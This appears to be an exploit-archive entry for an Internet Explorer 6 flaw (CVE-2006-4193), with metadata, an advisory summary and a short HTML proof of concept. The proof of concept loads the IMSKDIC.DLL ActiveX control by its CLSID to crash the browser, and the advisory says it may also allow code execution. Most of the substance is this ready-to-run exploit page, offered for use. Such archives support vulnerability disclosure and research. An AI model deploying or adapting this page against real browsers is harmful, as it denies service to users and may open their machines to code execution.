EXPLOITS

Microsoft Internet Explorer 6 - 'IMSKDIC.dll' Denial of Service

Author: nop
type: dos
platform: windows
port: 
date_added: 2006-08-15  
date_updated: 2013-09-19  
verified: 1  
codes: CVE-2006-4193;OSVDB-29345  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 28387.html  

source: https://www.securityfocus.com/bid/19521/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability.

This issue occurs because the application fails to load a DLL library when instantiated as an ActiveX control.

An attacker may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users and may cause arbitrary code to run within the context of the application.

  <-- /Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability
  //tested XP SP2 CN

  // nop (nop#xsec.org)
  // http://www.xsec.org


  // CLSID: {6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}
  // Info: Microsoft IME SingleKanjiDictionary interface
  // ProgID: IMESingleKanjiDict.8.1
  // InprocServer32: C:\WINDOWS\IME\imjp8_1\Applets\IMSKDIC.DLL

  --!>
  <html> <body>
  <object classid="CLSID:{6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}" /object>
  </body> </html>